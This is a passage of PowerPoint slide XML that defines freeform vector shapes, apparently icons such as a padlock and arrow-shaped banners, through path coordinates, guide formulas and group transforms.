              <a:gd name="T19" fmla="*/ 261578 h 256"/>
              <a:gd name="T20" fmla="*/ 32412 w 144"/>
              <a:gd name="T21" fmla="*/ 324941 h 256"/>
              <a:gd name="T22" fmla="*/ 19447 w 144"/>
              <a:gd name="T23" fmla="*/ 331440 h 256"/>
              <a:gd name="T24" fmla="*/ 0 w 144"/>
              <a:gd name="T25" fmla="*/ 311944 h 256"/>
              <a:gd name="T26" fmla="*/ 6482 w 144"/>
              <a:gd name="T27" fmla="*/ 298946 h 256"/>
              <a:gd name="T28" fmla="*/ 95614 w 144"/>
              <a:gd name="T29" fmla="*/ 207963 h 256"/>
              <a:gd name="T30" fmla="*/ 6482 w 144"/>
              <a:gd name="T31" fmla="*/ 116979 h 256"/>
              <a:gd name="T32" fmla="*/ 0 w 144"/>
              <a:gd name="T33" fmla="*/ 103981 h 256"/>
              <a:gd name="T34" fmla="*/ 19447 w 144"/>
              <a:gd name="T35" fmla="*/ 84485 h 256"/>
              <a:gd name="T36" fmla="*/ 32412 w 144"/>
              <a:gd name="T37" fmla="*/ 90984 h 256"/>
              <a:gd name="T38" fmla="*/ 97235 w 144"/>
              <a:gd name="T39" fmla="*/ 154347 h 256"/>
              <a:gd name="T40" fmla="*/ 97235 w 144"/>
              <a:gd name="T41" fmla="*/ 19496 h 256"/>
              <a:gd name="T42" fmla="*/ 116682 w 144"/>
              <a:gd name="T43" fmla="*/ 0 h 256"/>
              <a:gd name="T44" fmla="*/ 129646 w 144"/>
              <a:gd name="T45" fmla="*/ 6499 h 256"/>
              <a:gd name="T46" fmla="*/ 226881 w 144"/>
              <a:gd name="T47" fmla="*/ 103981 h 256"/>
              <a:gd name="T48" fmla="*/ 233363 w 144"/>
              <a:gd name="T49" fmla="*/ 116979 h 256"/>
              <a:gd name="T50" fmla="*/ 226881 w 144"/>
              <a:gd name="T51" fmla="*/ 129977 h 256"/>
              <a:gd name="T52" fmla="*/ 136128 w 144"/>
              <a:gd name="T53" fmla="*/ 349312 h 256"/>
              <a:gd name="T54" fmla="*/ 186366 w 144"/>
              <a:gd name="T55" fmla="*/ 298946 h 256"/>
              <a:gd name="T56" fmla="*/ 136128 w 144"/>
              <a:gd name="T57" fmla="*/ 248580 h 256"/>
              <a:gd name="T58" fmla="*/ 136128 w 144"/>
              <a:gd name="T59" fmla="*/ 349312 h 256"/>
              <a:gd name="T60" fmla="*/ 136128 w 144"/>
              <a:gd name="T61" fmla="*/ 66613 h 256"/>
              <a:gd name="T62" fmla="*/ 136128 w 144"/>
              <a:gd name="T63" fmla="*/ 167345 h 256"/>
              <a:gd name="T64" fmla="*/ 186366 w 144"/>
              <a:gd name="T65" fmla="*/ 116979 h 256"/>
              <a:gd name="T66" fmla="*/ 136128 w 144"/>
              <a:gd name="T67" fmla="*/ 66613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44" h="256">
                <a:moveTo>
                  <a:pt x="140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3" y="178"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="187"/>
                  <a:pt x="143" y="190"/>
                  <a:pt x="140" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="255"/>
                  <a:pt x="75" y="256"/>
                  <a:pt x="72" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="256"/>
                  <a:pt x="60" y="251"/>
                  <a:pt x="60" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161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18" y="203"/>
                  <a:pt x="15" y="204"/>
                  <a:pt x="12" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="204"/>
                  <a:pt x="0" y="199"/>
                  <a:pt x="0" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="189"/>
                  <a:pt x="1" y="186"/>
                  <a:pt x="4" y="184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0"/>
                  <a:pt x="0" y="67"/>
                  <a:pt x="0" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="5" y="52"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="52"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="20" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95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75" y="0"/>
                  <a:pt x="78" y="1"/>
                  <a:pt x="80" y="4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3" y="66"/>
                  <a:pt x="144" y="69"/>
                  <a:pt x="144" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="75"/>
                  <a:pt x="143" y="78"/>
                  <a:pt x="140" y="80"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="84" y="215"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="215"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="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11" name="Freeform 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA559715-1923-43C9-B40A-C2309DA2909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8029450" y="2603366"/>
            <a:ext cx="303353" cy="353750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="180" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="167" y="34"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="133" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="14"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="35" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="17" y="136"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="8" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="286"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="207" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="150"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="51" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="29"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="20"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="151" y="45"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="187" y="279"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="285"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="24" y="283"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="158"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="183" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="189" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="113" y="190"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="111" y="183"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="179"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="187"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="228"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="214"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="207" h="303">
                <a:moveTo>
                  <a:pt x="180" y="132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="189" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="21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2400"/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E4CE7046-64D6-48C1-B7B8-9D5763BA3105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3496641" y="1600201"/>
            <a:ext cx="5198718" cy="4496838"/>
            <a:chOff x="3736336" y="2014895"/>
            <a:chExt cx="4719296" cy="4082143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="113" name="Group 112"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3736336" y="5001931"/>
              <a:ext cx="1013878" cy="499940"/>
              <a:chOff x="3736336" y="5001931"/>
              <a:chExt cx="1013878" cy="499940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="161" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3736336" y="5001931"/>
                <a:ext cx="1013878" cy="499940"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 724"/>
                  <a:gd name="T1" fmla="*/ 357 h 357"/>
                  <a:gd name="T2" fmla="*/ 507 w 724"/>
                  <a:gd name="T3" fmla="*/ 357 h 357"/>
                  <a:gd name="T4" fmla="*/ 724 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 357"/>
                  <a:gd name="T6" fmla="*/ 260 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 357"/>
                  <a:gd name="T8" fmla="*/ 0 w 724"/>
                  <a:gd name="T9" fmla="*/ 176 h 357"/>
                  <a:gd name="T10" fmla="*/ 260 w 724"/>
                  <a:gd name="T11" fmla="*/ 357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4" h="357">
                    <a:moveTo>
                      <a:pt x="260" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="507" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="357"/>
                    </a:ln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" name="Freeform 14"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3789551" y="5031340"/>
                <a:ext cx="943859" cy="441124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 674 w 674"/>
                  <a:gd name="T1" fmla="*/ 0 h 315"/>
                  <a:gd name="T2" fmla="*/ 230 w 674"/>
                  <a:gd name="T3" fmla="*/ 0 h 315"/>
                  <a:gd name="T4" fmla="*/ 0 w 674"/>
                  <a:gd name="T5" fmla="*/ 155 h 315"/>
                  <a:gd name="T6" fmla="*/ 230 w 674"/>
                  <a:gd name="T7" fmla="*/ 315 h 315"/>
                  <a:gd name="T8" fmla="*/ 481 w 674"/>
                  <a:gd name="T9" fmla="*/ 315 h 315"/>
                  <a:gd name="T10" fmla="*/ 674 w 674"/>
                  <a:gd name="T11" fmla="*/ 0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315">
                    <a:moveTo>
                      <a:pt x="674" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67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14" name="Group 113"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4433728" y="3567930"/>
              <a:ext cx="987271" cy="568559"/>
              <a:chOff x="4433728" y="3567930"/>
              <a:chExt cx="987271" cy="568559"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="157" name="Freeform 11"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433728" y="3567930"/>
                <a:ext cx="987271" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 705"/>
                  <a:gd name="T1" fmla="*/ 406 h 406"/>
                  <a:gd name="T2" fmla="*/ 488 w 705"/>
                  <a:gd name="T3" fmla="*/ 406 h 406"/>
                  <a:gd name="T4" fmla="*/ 705 w 705"/>
                  <a:gd name="T5" fmla="*/ 0 h 406"/>
                  <a:gd name="T6" fmla="*/ 260 w 705"/>
                  <a:gd name="T7" fmla="*/ 0 h 406"/>
                  <a:gd name="T8" fmla="*/ 0 w 705"/>
                  <a:gd name="T9" fmla="*/ 202 h 406"/>
                  <a:gd name="T10" fmla="*/ 260 w 705"/>
                  <a:gd name="T11" fmla="*/ 406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5" h="406">
                    <a:moveTo>
                      <a:pt x="260" y="406"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="406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" name="Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4488343" y="3600139"/>
                <a:ext cx="917252" cy="504141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 655 w 655"/>
                  <a:gd name="T1" fmla="*/ 0 h 360"/>
                  <a:gd name="T2" fmla="*/ 230 w 655"/>
                  <a:gd name="T3" fmla="*/ 0 h 360"/>
                  <a:gd name="T4" fmla="*/ 0 w 655"/>
                  <a:gd name="T5" fmla="*/ 179 h 360"/>
                  <a:gd name="T6" fmla="*/ 230 w 655"/>
                  <a:gd name="T7" fmla="*/ 360 h 360"/>
                  <a:gd name="T8" fmla="*/ 462 w 655"/>
                  <a:gd name="T9" fmla="*/ 360 h 360"/>
                  <a:gd name="T10" fmla="*/ 655 w 655"/>
                  <a:gd name="T11" fmla="*/ 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5" h="360">
                    <a:moveTo>
                      <a:pt x="655" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655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" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4778222" y="3710770"/>
                <a:ext cx="141439" cy="246469"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 111"/>
                  <a:gd name="T1" fmla="*/ 117 h 194"/>
                  <a:gd name="T2" fmla="*/ 96 w 111"/>
                  <a:gd name="T3" fmla="*/ 175 h 194"/>
                  <a:gd name="T4" fmla="*/ 56 w 111"/>
                  <a:gd name="T5" fmla="*/ 194 h 194"/>
                  <a:gd name="T6" fmla="*/ 15 w 111"/>
                  <a:gd name="T7" fmla="*/ 175 h 194"/>
                  <a:gd name="T8" fmla="*/ 0 w 111"/>
                  <a:gd name="T9" fmla="*/ 117 h 194"/>
                  <a:gd name="T10" fmla="*/ 0 w 111"/>
                  <a:gd name="T11" fmla="*/ 77 h 194"/>
                  <a:gd name="T12" fmla="*/ 15 w 111"/>
                  <a:gd name="T13" fmla="*/ 19 h 194"/>
                  <a:gd name="T14" fmla="*/ 55 w 111"/>
                  <a:gd name="T15" fmla="*/ 0 h 194"/>
                  <a:gd name="T16" fmla="*/ 96 w 111"/>
                  <a:gd name="T17" fmla="*/ 19 h 194"/>
                  <a:gd name="T18" fmla="*/ 111 w 111"/>
                  <a:gd name="T19" fmla="*/ 77 h 194"/>
                  <a:gd name="T20" fmla="*/ 111 w 111"/>
                  <a:gd name="T21" fmla="*/ 117 h 194"/>
                  <a:gd name="T22" fmla="*/ 74 w 111"/>
                  <a:gd name="T23" fmla="*/ 73 h 194"/>
                  <a:gd name="T24" fmla="*/ 69 w 111"/>
                  <a:gd name="T25" fmla="*/ 40 h 194"/>
                  <a:gd name="T26" fmla="*/ 56 w 111"/>
                  <a:gd name="T27" fmla="*/ 30 h 194"/>
